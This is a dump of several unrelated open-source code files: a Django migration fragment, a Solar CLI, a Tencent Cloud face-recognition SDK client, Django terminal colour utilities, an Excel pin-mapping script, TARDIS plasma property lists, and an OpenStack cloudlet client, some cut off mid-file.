            field=models.CharField(help_text=b'Brain imaging procedure that was used to acquire the data.', max_length=200, verbose_name=b'Modality & Acquisition Type', choices=[(b'fMRI-BOLD', b'fMRI-BOLD'), (b'fMRI-CBF', b'fMRI-CBF'), (b'fMRI-CBV', b'fMRI-CBV'), (b'Diffusion MRI', b'Diffusion MRI'), (b'Structural MRI', b'Structural MRI'), (b'PET FDG', b'PET FDG'), (b'PET [15O]-water', b'PET [15O]-water'), (b'PET other', b'PET other'), (b'MEG', b'MEG'), (b'EEG', b'EEG'), (b'Other', b'Other')]),
            preserve_default=True,
        ),
    ]
|
dshulyak/solar | solar/solar/cli/system_log.py | Python | apache-2.0 | 2,234 | 0.000895 |
import sys
import click
from solar.core import testing
from solar.core import resource
from solar.system_log import change
from solar.system_log import operations
from solar.system_log import data
from solar.cli.uids_history import get_uid, remember_uid, SOLARUID
@click.group()
def changes():
    """Root command group for system-log / staged-changes operations."""
    pass
@changes.command()
def validate():
    """Validate all resources; print errors and exit non-zero on failure."""
    errors = resource.validate_resources()
    if errors:
        for r, error in errors:
            print 'ERROR: %s: %s' % (r.name, error)
        sys.exit(1)
@changes.command()
@click.option('-d', default=False, is_flag=True)
def stage(d):
    """List staged changes, newest first; -d also prints per-item details."""
    log = list(change.stage_changes().reverse())
    for item in log:
        click.echo(item)
        if d:
            for line in item.details:
                click.echo(' '*4+line)
    if not log:
        click.echo('No changes')
@changes.command(name='staged-item')
@click.argument('log_action')
def staged_item(log_action):
    """Show a single staged change (with details) by its log action key."""
    item = data.SL().get(log_action)
    if not item:
        click.echo('No staged changes for {}'.format(log_action))
    else:
        click.echo(item)
        for line in item.details:
            click.echo(' '*4+line)
@changes.command()
def process():
    """Send staged changes to orchestration; remember and print the uid."""
    uid = change.send_to_orchestration()
    remember_uid(uid)
    click.echo(uid)
@changes.command()
@click.argument('uid', type=SOLARUID)
def commit(uid):
    """Commit the orchestration run identified by uid."""
    operations.commit(uid)
@changes.command()
@click.option('-n', default=5)
def history(n):
    """Show the last n committed changes (oldest first)."""
    commited = list(data.CL().collection(n))
    if not commited:
        click.echo('No history.')
        return
    commited.reverse()
    # NOTE(review): echoes the list's repr in one line; verify this is the
    # intended output format rather than one entry per line.
    click.echo(commited)
@changes.command()
def test():
    """Run all resource tests and print a colored OK/ERROR line for each."""
    results = testing.test_all()

    for name, result in results.items():
        msg = '[{status}] {name} {message}'
        kwargs = {
            'name': name,
            'message': '',
            'status': 'OK',
        }

        if result['status'] == 'ok':
            kwargs['status'] = click.style('OK', fg='green')
        else:
            kwargs['status'] = click.style('ERROR', fg='red')
            kwargs['message'] = result['message']

        click.echo(msg.format(**kwargs))
@changes.command(name='clean-history')
def clean_history():
    """Wipe the commit log and committed data stores."""
    data.CL().clean()
    data.CD().clean()
|
tzpBingo/github-trending | codespace/python/tencentcloud/iai/v20200303/iai_client.py | Python | mit | 65,319 | 0.002484 | # -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
from tencentcloud.common.exception.tencent_cloud_sdk_exception import TencentCloudSDKException
from tencentcloud.common.abstract_client import AbstractClient
from tencentcloud.iai.v20200303 import models
class IaiClient(AbstractClient):
_apiVersion = '2020-03-03'
_endpoint = 'iai.tencentcloudapi.com'
_service | = 'iai'
def AnalyzeDenseLandmarks(self, request):
"""对请求图片进行五官定位(也称人脸关键点定位),获得人脸的精准信息,返回多达888点关键信息,对五官和脸部轮廓进行精确定位。
:param request: Request instance for AnalyzeDenseLandmarks.
:type request: :class:`tencentcloud.iai.v20200303.models.AnalyzeDenseLandmarksR | equest`
:rtype: :class:`tencentcloud.iai.v20200303.models.AnalyzeDenseLandmarksResponse`
"""
try:
params = request._serialize()
body = self.call("AnalyzeDenseLandmarks", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AnalyzeDenseLandmarksResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def AnalyzeFace(self, request):
"""对请求图片进行五官定位(也称人脸关键点定位),计算构成人脸轮廓的 90 个点,包括眉毛(左右各 8 点)、眼睛(左右各 8 点)、鼻子(13 点)、嘴巴(22 点)、脸型轮廓(21 点)、眼珠[或瞳孔](2点)。
>
- 公共参数中的签名方式请使用V3版本,即配置SignatureMethod参数为TC3-HMAC-SHA256。
:param request: Request instance for AnalyzeFace.
:type request: :class:`tencentcloud.iai.v20200303.models.AnalyzeFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.AnalyzeFaceResponse`
"""
try:
params = request._serialize()
body = self.call("AnalyzeFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.AnalyzeFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CheckSimilarPerson(self, request):
"""对指定的人员库进行人员查重,给出疑似相同人的信息。
可以使用本接口对已有的单个人员库进行人员查重,避免同一人在单个人员库中拥有多个身份;也可以使用本接口对已有的多个人员库进行人员查重,查询同一人是否同时存在多个人员库中。
不支持跨算法模型版本查重,且目前仅支持算法模型为3.0的人员库使用查重功能。
>
- 若对完全相同的指定人员库进行查重操作,需等待上次操作完成才可。即,若两次请求输入的 GroupIds 相同,第一次请求若未完成,第二次请求将返回失败。
>
- 查重的人员库状态为腾讯云开始进行查重任务的那一刻,即您可以理解为当您发起查重请求后,若您的查重任务需要排队,在排队期间您对人员库的增删操作均会会影响查重的结果。腾讯云将以开始进行查重任务的那一刻人员库的状态进行查重。查重任务开始后,您对人员库的任何操作均不影响查重任务的进行。但建议查重任务开始后,请不要对人员库中人员和人脸进行增删操作。
:param request: Request instance for CheckSimilarPerson.
:type request: :class:`tencentcloud.iai.v20200303.models.CheckSimilarPersonRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CheckSimilarPersonResponse`
"""
try:
params = request._serialize()
body = self.call("CheckSimilarPerson", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CheckSimilarPersonResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CompareFace(self, request):
"""对两张图片中的人脸进行相似度比对,返回人脸相似度分数。
若您需要判断 “此人是否是某人”,即验证某张图片中的人是否是已知身份的某人,如常见的人脸登录场景,建议使用[人脸验证](https://cloud.tencent.com/document/product/867/44983)或[人员验证](https://cloud.tencent.com/document/product/867/44982)接口。
>
- 公共参数中的签名方式请使用V3版本,即配置SignatureMethod参数为TC3-HMAC-SHA256。
:param request: Request instance for CompareFace.
:type request: :class:`tencentcloud.iai.v20200303.models.CompareFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CompareFaceResponse`
"""
try:
params = request._serialize()
body = self.call("CompareFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CompareFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CompareMaskFace(self, request):
"""对两张图片中的人脸进行相似度比对,返回人脸相似度分数。
戴口罩人脸比对接口可在人脸戴口罩情况下使用,口罩遮挡程度最高可以遮挡鼻尖。
如图片人脸不存在戴口罩情况,建议使用人脸比对服务。
:param request: Request instance for CompareMaskFace.
:type request: :class:`tencentcloud.iai.v20200303.models.CompareMaskFaceRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CompareMaskFaceResponse`
"""
try:
params = request._serialize()
body = self.call("CompareMaskFace", params)
response = json.loads(body)
if "Error" not in response["Response"]:
model = models.CompareMaskFaceResponse()
model._deserialize(response["Response"])
return model
else:
code = response["Response"]["Error"]["Code"]
message = response["Response"]["Error"]["Message"]
reqid = response["Response"]["RequestId"]
raise TencentCloudSDKException(code, message, reqid)
except Exception as e:
if isinstance(e, TencentCloudSDKException):
raise
else:
raise TencentCloudSDKException(e.message, e.message)
def CopyPerson(self, request):
"""将已存在于某人员库的人员复制到其他人员库,该人员的描述信息不会被复制。单个人员最多只能同时存在100个人员库中。
>
- 注:若该人员创建时算法模型版本为2.0,复制到非2.0算法模型版本的Group中时,复制操作将会失败。
:param request: Request instance for CopyPerson.
:type request: :class:`tencentcloud.iai.v20200303.models.CopyPersonRequest`
:rtype: :class:`tencentcloud.iai.v20200303.models.CopyPersonResponse`
"""
try:
params = request._serialize()
body = self.cal |
"""
termcolors.py
"""
from django.utils import six
color_names = ('black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white')
foreground = dict((color_names[x], '3%s' % x) for x in range(8))
background = dict((color_names[x], '4%s' % x) for x in range(8))
RESET = '0'
opt_dict = {'bold': '1', 'underscore': '4', 'blink': '5', 'reverse': '7', 'conceal': '8'}
def colorize(text='', opts=(), **kwargs):
    """
    Returns your text, enclosed in ANSI graphics codes.

    Depends on the keyword arguments 'fg' and 'bg', and the contents of
    the opts tuple/list.

    Returns the RESET code if no parameters are given.

    Valid colors:
        'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'

    Valid options:
        'bold'
        'underscore'
        'blink'
        'reverse'
        'conceal'
        'noreset' - string will not be auto-terminated with the RESET code

    Examples:
        colorize('hello', fg='red', bg='blue', opts=('blink',))
        colorize()
        colorize('goodbye', opts=('underscore',))
        print(colorize('first line', fg='red', opts=('noreset',)))
        print('this should be red too')
        print(colorize('and so should this'))
        print('this should not be red')
    """
    code_list = []
    if text == '' and len(opts) == 1 and opts[0] == 'reset':
        return '\x1b[%sm' % RESET
    # Look up 'fg' and 'bg' explicitly instead of iterating kwargs: the
    # foreground code then always precedes the background code regardless of
    # keyword-argument order, and six.iteritems() is no longer needed.
    if 'fg' in kwargs:
        code_list.append(foreground[kwargs['fg']])
    if 'bg' in kwargs:
        code_list.append(background[kwargs['bg']])
    for o in opts:
        if o in opt_dict:
            code_list.append(opt_dict[o])
    if 'noreset' not in opts:
        text = '%s\x1b[%sm' % (text or '', RESET)
    return '%s%s' % (('\x1b[%sm' % ';'.join(code_list)), text or '')
def make_style(opts=(), **kwargs):
    """
    Returns a function with default parameters for colorize()

    Example:
        bold_red = make_style(opts=('bold',), fg='red')
        print(bold_red('hello'))
        KEYWORD = make_style(fg='yellow')
        COMMENT = make_style(fg='blue', opts=('bold',))
    """
    def style_func(text):
        return colorize(text, opts, **kwargs)
    return style_func
NOCOLOR_PALETTE = 'nocolor'
DARK_PALETTE = 'dark'
LIGHT_PALETTE = 'light'
PALETTES = {
NOCOLOR_PALETTE: {
'ERROR': {},
'NOTICE': {},
'SQL_FIELD': {},
'SQL_COLTYPE': {},
'SQL_KEYWORD': {},
'SQL_TABLE': {},
'HTTP_INFO': {},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {},
'HTTP_NOT_MODIFIED': {},
'HTTP_BAD_REQUEST': {},
'HTTP_NOT_FOUND': {},
'HTTP_SERVER_ERROR': {},
'MIGRATE_HEADING': {},
'MIGRATE_LABEL': {},
'MIGRATE_SUCCESS': {},
'MIGRATE_FAILURE': {},
},
DARK_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'yellow'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green'},
'HTTP_NOT_MODIFIED': {'fg': 'cyan'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'yellow'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
'MIGRATE_SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'MIGRATE_FAILURE': {'fg': 'red', 'opts': ('bold',)},
},
LIGHT_PALETTE: {
'ERROR': {'fg': 'red', 'opts': ('bold',)},
'NOTICE': {'fg': 'red'},
'SQL_FIELD': {'fg': 'green', 'opts': ('bold',)},
'SQL_COLTYPE': {'fg': 'green'},
'SQL_KEYWORD': {'fg': 'blue'},
'SQL_TABLE': {'opts': ('bold',)},
'HTTP_INFO': {'opts': ('bold',)},
'HTTP_SUCCESS': {},
'HTTP_REDIRECT': {'fg': 'green', 'opts': ('bold',)},
'HTTP_NOT_MODIFIED': {'fg': 'green'},
'HTTP_BAD_REQUEST': {'fg': 'red', 'opts': ('bold',)},
'HTTP_NOT_FOUND': {'fg': 'red'},
'HTTP_SERVER_ERROR': {'fg': 'magenta', 'opts': ('bold',)},
'MIGRATE_HEADING': {'fg': 'cyan', 'opts': ('bold',)},
'MIGRATE_LABEL': {'opts': ('bold',)},
'MIGRATE_SUCCESS': {'fg': 'green', 'opts': ('bold',)},
'MIGRATE_FAILURE': {'fg': 'red', 'opts': ('bold',)},
}
}
DEFAULT_PALETTE = DARK_PALETTE
def parse_color_setting(config_string):
    """Parse a DJANGO_COLORS environment variable to produce the system palette

    The general form of a palette definition is:

        "palette;role=fg;role=fg/bg;role=fg,option,option;role=fg/bg,option,option"

    where:
        palette is a named palette; one of 'light', 'dark', or 'nocolor'.
        role is a named style used by Django
        fg is a foreground color.
        bg is a background color.
        option is a display option.

    Specifying a named palette is the same as manually specifying the individual
    definitions for each role. Any individual definitions following the palette
    definition will augment the base palette definition.

    Valid roles:
        'error', 'notice', 'sql_field', 'sql_coltype', 'sql_keyword', 'sql_table',
        'http_info', 'http_success', 'http_redirect', 'http_bad_request',
        'http_not_found', 'http_server_error'

    Valid colors:
        'black', 'red', 'green', 'yellow', 'blue', 'magenta', 'cyan', 'white'

    Valid options:
        'bold', 'underscore', 'blink', 'reverse', 'conceal'

    Returns the assembled palette dict, or None when the configuration ends up
    specifying no colors at all.
    """
    if not config_string:
        return PALETTES[DEFAULT_PALETTE]
    # Split the color configuration into parts
    parts = config_string.lower().split(';')
    # Start from the all-roles, no-color palette and layer definitions on top.
    palette = PALETTES[NOCOLOR_PALETTE].copy()
    for part in parts:
        if part in PALETTES:
            # A default palette has been specified
            palette.update(PALETTES[part])
        elif '=' in part:
            # Process a palette defining string
            definition = {}
            # Break the definition into the role,
            # plus the list of specific instructions.
            # The role must be in upper case
            role, instructions = part.split('=')
            role = role.upper()
            # Reversed so .pop() below yields instructions in written order.
            styles = instructions.split(',')
            styles.reverse()
            # The first instruction can contain a slash
            # to break apart fg/bg.
            colors = styles.pop().split('/')
            colors.reverse()
            fg = colors.pop()
            if fg in color_names:
                definition['fg'] = fg
            if colors and colors[-1] in color_names:
                definition['bg'] = colors[-1]
            # All remaining instructions are options
            opts = tuple(s for s in styles if s in opt_dict.keys())
            if opts:
                definition['opts'] = opts
            # The nocolor palette has all available roles.
            # Use that palette as the basis for determining
            # if the role is valid.
            if role in PALETTES[NOCOLOR_PALETTE] and definition:
                palette[role] = definition
    # If there are no colors specified, return the empty palette.
    if palette == PALETTES[NOCOLOR_PALETTE]:
        return None
    return palette
|
# encoding: utf-8
import sys
import os
import signal
from openpyxl.utils import get_column_letter
from openpyxl import Workbook,load_workbook
ItemList=[]
## {{{ http://code.activestate.com/recipes/410692/ (r8)
# This class provides the functionality we want. You only need to look at
# this if you want to know how this works. It only needs to be defined
# once, no need to muck around with its internals.
class switch(object):
    """One-shot value dispatcher emulating a C-style switch statement.

    Iterating a ``switch`` yields a single ``match`` callable.  Once a
    ``match(...)`` call succeeds, every later call returns True so that
    execution "falls through" the remaining cases, like C's switch.
    """
    def __init__(self, value):
        self.value = value
        self.fall = False  # becomes True after the first successful match
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
        # PEP 479: raising StopIteration inside a generator becomes a
        # RuntimeError on Python 3.7+; simply returning ends the iteration.
        return
    def match(self, *args):
        """Indicate whether or not to enter a case suite"""
        if self.fall or not args:
            return True
        elif self.value in args:
            self.fall = True
            return True
        else:
            return False
class Items:
    """Per-pin record linking a package ball name to its GPIO and net data."""
    def __init__(self, BallName,GPIO):
        self.BallName = BallName
        self.GPIO = GPIO
        # The remaining fields are unknown at construction time and are
        # filled in later via the set_* helpers below.
        self.NetName = None
        self.Direction = None
        self.Data = None
        self.Position = None
    def set_NetName(self, NetName):
        # Schematic net name attached to this ball.
        self.NetName=NetName
    def set_Direction(self, Direction):
        self.Direction=Direction
    def set_Data(self, Data):
        self.Data=Data
    def set_Position(self, Position):
        # Position key used to match this ball against signal placements.
        self.Position=Position
def GetCellValue(ws, index_row, column_letter):
    """Return the value stored in cell <column_letter><index_row> of *ws*."""
    cell_ref = column_letter + str(index_row)
    return ws[cell_ref].value
def GetColumnNameAndChangeValue(ws, string_row, changelist, index_row):
    """Build a "<header> to [<value>] " summary for every column letter in
    *changelist*, taking headers from *string_row* and values from *index_row*."""
    parts = []
    for column_letter in changelist:
        header = str(GetCellValue(ws, string_row, column_letter))
        value = str(GetCellValue(ws, index_row, column_letter))
        parts.append(header + ' to [' + value + '] ')
    return "".join(parts)
def GetNumAndName(ws, index_row):
    """Return "[<column D>] <column C> : " for the given row."""
    number = GetCellValue(ws, index_row, 'D')
    name = GetCellValue(ws, index_row, 'C')
    return '[' + number + '] ' + name + ' : '
def GetColumnLetter(ws, string_row, string_value):
    """Scan columns 1-39 of *string_row* for a header equal to *string_value*.

    Returns the matching column letter, or None when no header matches.
    """
    for column_index in range(1, 40):
        letter = get_column_letter(column_index)
        if ws[letter + str(string_row)].value == string_value:
            return letter
    return None
def Get_Bit(byteval, idx):
    """Return True when bit *idx* of integer *byteval* is set."""
    mask = 1 << idx
    return (byteval & mask) != 0
def AppendBit(data_L, data_M):
    """Render the set bits of a 16-bit value split into two hex-string bytes.

    *data_L* / *data_M* are hex strings for the low / high byte, or 0 when
    that byte is absent.  Returns e.g. "0/3/9/\n"; "" when both are absent.
    """
    pieces = []
    if data_L != 0:
        low = int(data_L, 16)
        pieces.extend(str(i) + "/" for i in range(8) if (low >> i) & 1)
    if data_M != 0:
        high = int(data_M, 16)
        pieces.extend(str(i + 8) + "/" for i in range(8) if (high >> i) & 1)
    # A trailing newline is emitted whenever at least one byte was supplied,
    # even if no bit in it was set.
    if data_L != 0 or data_M != 0:
        pieces.append("\n")
    return "".join(pieces)
def StringToSignint(string, len):
    """Interpret a hex string as a two's-complement signed int of *len* bytes."""
    value = int(string, 16)
    span = 1 << (8 * len)
    # Values above the midpoint represent negatives in two's complement.
    if value > (span / 2) - 1:
        value -= span
    return value
def ExcelToStruct(filename):
    """Load *filename*, clear columns C-G of every data row, and populate the
    module-level ItemList with one Items(BallName, GPIO) record per row that
    has a GPIO assignment.

    Rows are scanned from row 2 until the BallName column is empty.  The
    cleared workbook is saved back to *filename*.
    """
    try:
        wb = load_workbook(filename)
    except IOError:
        print ("Can't open file exit")
        sys.exit(0)
    ws = wb.active
    index_row = 2
    print ("clear All data in excel")
    # The header columns do not move, so resolve their letters once instead
    # of on every loop iteration.
    ball_col = GetColumnLetter(ws, 1, 'BallName')
    gpio_col = GetColumnLetter(ws, 1, 'GPIO')
    # First pass: blank out the previously generated columns (C..G).
    tmp_row = index_row
    while True:
        BallName = ws[ball_col + str(tmp_row)].value
        if BallName is None:
            break
        for row in ws['C' + str(tmp_row) + ':G' + str(tmp_row)]:
            for cell in row:
                cell.value = None
        tmp_row = tmp_row + 1
    # Second pass: collect every row that has a GPIO assignment.
    while True:
        BallName = ws[ball_col + str(index_row)].value
        if BallName is None:
            break
        GPIOPPin = ws[gpio_col + str(index_row)].value
        if GPIOPPin is not None:
            ItemList.append(Items(BallName, GPIOPPin))
        index_row = index_row + 1
    wb.save(filename)
def StructToExcel(filename):
    """Write the NetName of every resolved ItemList entry back into the
    NetName column of *filename*, matching rows by (stripped) BallName."""
    try:
        wb = load_workbook(filename)
    except IOError:
        print ("Can't open file exit")
        sys.exit(0)
    ws = wb.active
    index_row=2
    # Scan data rows until the BallName column runs out.
    while True:
        BallName=ws[GetColumnLetter(ws,1,'BallName')+str(index_row)].value
        if BallName==None:
            break;
        # Copy the net name of any item that matches this row's ball name.
        for item in ItemList:
            if item.BallName!=None and item.NetName !=None and BallName.strip() == item.BallName.strip():
                ws[GetColumnLetter(ws,1,'NetName')+str(index_row)] = item.NetName
        index_row = index_row+1;
    wb.save(filename)
def FindBallNameAppend(BallName, Position):
    """Attach *Position* to every ItemList entry whose BallName matches."""
    wanted = BallName.strip()
    for entry in ItemList:
        if wanted == entry.BallName.strip():
            entry.set_Position(Position)
def FindPositionAppend(Position, SIG_NAME):
    """Record *SIG_NAME* as the net name of every item located at *Position*.

    Signal names containing a literal backslash-g marker are skipped.
    """
    if "\g" in SIG_NAME:
        return
    wanted = xstr(Position).strip()
    for entry in ItemList:
        if wanted == xstr(entry.Position).strip():
            entry.set_NetName(SIG_NAME)
def xstr(s):
    """Like str(), except that None maps to the empty string."""
    return '' if s is None else str(s)
def CheckEmptyNetName():
    """Give every unconnected item a NOT_CONNECT_<pin-suffix> placeholder net."""
    for entry in ItemList:
        if entry.NetName is None:
            entry.set_NetName("NOT_CONNECT_" + entry.GPIO[4:])
def PrintItemList():
    """Dump every item (ball, GPIO, position, net name) to stdout for debugging."""
    for entry in ItemList:
        line = " ".join([xstr(entry.BallName), xstr(entry.GPIO),
                         xstr(entry.Position), xstr(entry.NetName)])
        print (line)
|
from tardis.plasma.properties import *
class PlasmaPropertyCollection(list):
    """A list subclass used to group plasma property classes into named sets."""
    pass
basic_inputs = PlasmaPropertyCollection([TRadiative, Abundance, Density,
TimeExplosion, AtomicData, JBlues, DilutionFactor, LinkTRadTElectron,
RadiationFieldCorrectionInput, NLTESpecies, PreviousBetaSobolev,
PreviousElectronDensities])
basic_properties = PlasmaPropertyCollection([BetaRadiation,
Levels, Lines, AtomicMass, PartitionFunction,
    GElectron, IonizationData, NumberDensity, LinesLowerLevelIndex,
LinesUpperLevelIndex, TauSobolev, LevelNumberDensity, IonNumberDensity,
StimulatedEmissionFactor, SelectedAtoms, ElectronTemperature])
lte_ionization_properties = PlasmaPropertyCollection([PhiSahaLTE])
lte_excitation_properties = PlasmaPropertyCollection([LevelBoltzmannFactorLTE])
macro_atom_properties = PlasmaPropertyCollection([BetaSobolev,
TransitionProbabilities])
nebular_ionization_properties = PlasmaPropertyCollection([PhiSahaNebular,
ZetaData, BetaElectron, RadiationFieldCorrection, Chi0])
dilute_lte_excitation_properties = PlasmaPropertyCollection([
LevelBoltzmannFactorDiluteLTE])
non_nlte_properties = PlasmaPropertyCollection([LevelBoltzmannFactorNoNLTE])
nlte_properties = PlasmaPropertyCollection([
LevelBoltzmannFactorNLTE, NLTEData, NLTESpecies, LTEJBlues])
helium_nlte_properties = PlasmaPropertyCollection([HeliumNLTE,
RadiationFieldCorrection, ZetaData,
BetaElectron, Chi0])
helium_numerical_nlte_properties = PlasmaPropertyCollection([
HeliumNumericalNLTE])
|
#!/usr/bin/env python
# Elijah: Cloudlet Infrastructure for Mobile Computing
#
# Author: Kiryong Ha <krha@cmu.edu>
#
# Copyright (C) 2011-2014 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import os
import httplib
import json
import math
import subprocess
import urllib
from pprint import pprint
from optparse import OptionParser
from urlparse import urlparse
from tempfile import mkdtemp
from client_util import CLOUDLET_TYPE
from client_util import CLOUDLET_COMMAND
from client_util import find_matching_flavor
from client_util import get_resource_size
from client_util import create_flavor
from elijah.provisioning.package import PackagingUtil
from elijah.provisioning.package import _FileFile
import elijah.provisioning.memory_util as elijah_memory_util
from elijah.provisioning.package import BaseVMPackage
import glanceclient as glance_client
import zipfile
import shutil
class CloudletClientError(Exception):
    """Raised when a cloudlet API request cannot be constructed or fulfilled."""
    pass
def get_list(server_address, token, end_point, request_list):
    """Fetch the detailed listing of one OpenStack resource collection.

    :param server_address: keystone server address (unused; kept for API symmetry)
    :param token: auth token sent in the X-Auth-Token header
    :param end_point: parsed service endpoint tuple (scheme, netloc, path, ...)
    :param request_list: one of 'images', 'flavors', 'extensions', 'servers'
    :return: the list stored under *request_list* in the JSON response
    """
    if request_list not in ('images', 'flavors', 'extensions', 'servers'):
        sys.stderr.write(
            "Error, Cannot support listing for %s\n" %
            request_list)
        sys.exit(1)

    params = urllib.urlencode({})
    headers = {"X-Auth-Token": token, "Content-type": "application/json"}
    # Only 'extensions' has no /detail variant.
    if request_list == 'extensions':
        end_string = "%s/%s" % (end_point[2], request_list)
    else:
        end_string = "%s/%s/detail" % (end_point[2], request_list)

    # HTTP response; close the connection even when the request fails part-way.
    conn = httplib.HTTPConnection(end_point[1])
    try:
        conn.request("GET", end_string, params, headers)
        response = conn.getresponse()
        data = response.read()
    finally:
        conn.close()
    dd = json.loads(data)
    return dd[request_list]
def request_synthesis(server_address, token, end_point, key_name=None,
                      server_name=None, overlay_url=None):
    """Request provisioning of a new VM instance synthesized from a VM overlay.

    Reads the overlay metadata to locate the matching base VM image and a
    flavor matching the base VM's resource allocation, then issues the
    server-creation request to the OpenStack endpoint.

    :param server_address: keystone server address (passed through to get_list)
    :param token: auth token for the X-Auth-Token header
    :param end_point: parsed service endpoint tuple (scheme, netloc, path, ...)
    :param key_name: optional keypair name to inject into the instance
    :param server_name: name for the new instance
    :param overlay_url: URL of the VM overlay package
    :return: parsed JSON response of the server-creation call
    :raises CloudletClientError: when no matching base VM or flavor exists
    """
    # read meta data from vm overlay URL
    from elijah.provisioning.package import VMOverlayPackage
    try:
        from elijah.provisioning import msgpack
    except ImportError as e:
        import msgpack

    overlay_package = VMOverlayPackage(overlay_url)
    meta_raw = overlay_package.read_meta()
    meta_info = msgpack.unpackb(meta_raw)
    requested_basevm_id = meta_info['base_vm_sha256']

    # find the base VM image whose sha256 matches the overlay's base VM
    image_list = get_list(server_address, token, end_point, "images")
    basevm_uuid = None
    basevm_xml = None
    basevm_disk = 0
    for image in image_list:
        properties = image.get("metadata", None)
        if properties is None or len(properties) == 0:
            continue
        if properties.get(CLOUDLET_TYPE.PROPERTY_KEY_CLOUDLET_TYPE) != \
                CLOUDLET_TYPE.IMAGE_TYPE_BASE_DISK:
            continue
        base_sha256_uuid = properties.get(CLOUDLET_TYPE.PROPERTY_KEY_BASE_UUID)
        if base_sha256_uuid == requested_basevm_id:
            basevm_uuid = image['id']
            basevm_xml = properties.get(
                CLOUDLET_TYPE.PROPERTY_KEY_BASE_RESOURCE,
                None)
            basevm_disk = image.get('minDisk', 0)
            break
    if basevm_uuid is None:
        raise CloudletClientError("Cannot find matching Base VM with (%s)" %
                                  str(requested_basevm_id))

    # find a flavor matching the base VM's resource allocation
    if basevm_xml is None:
        msg = "Cannot find resource allocation information of base VM (%s)" %\
            str(requested_basevm_id)
        raise CloudletClientError(msg)
    cpu_count, memory_mb = get_resource_size(basevm_xml)
    flavor_list = get_list(server_address, token, end_point, "flavors")
    flavor_ref, flavor_id = find_matching_flavor(flavor_list, cpu_count,
                                                 memory_mb, basevm_disk)
    if flavor_ref is None or flavor_id is None:
        msg = "Cannot find matching flavor: vcpu (%d), ram (%d MB), disk (%d GB)\n" % (
            cpu_count, memory_mb, basevm_disk)
        msg += "Please create the matching at your OpenStack"
        raise CloudletClientError(msg)

    # generate request; overlay_url metadata triggers synthesis on the server
    meta_data = {"overlay_url": overlay_url}
    s = {
        "server": {
            "name": server_name, "imageRef": str(basevm_uuid),
            "flavorRef": flavor_id, "metadata": meta_data,
            "min_count": "1", "max_count": "1",
            "key_name": key_name,
        }}
    params = json.dumps(s)
    headers = {"X-Auth-Token": token, "Content-type": "application/json"}

    conn = httplib.HTTPConnection(end_point[1])
    conn.request("POST", "%s/servers" % end_point[2], params, headers)
    sys.stdout.write("request new server: %s/servers\n" % (end_point[2]))
    response = conn.getresponse()
    data = response.read()
    dd = json.loads(data)
    conn.close()
    return dd
def _request_handoff_recv(server_address, token, end_point,
server_name=None, overlay_url=None):
"""Test for handoff receving"""
# read meta data from vm overlay URL
from elijah.provisioning.package import VMOverlayPackage
try:
from elijah.provisioning import msgpack
except ImportError as e:
import msgpack
overlay_package = VMOverlayPackage(overlay_url)
meta_raw = overlay_package.read_meta()
meta_info = msgpack.unpackb(meta_raw)
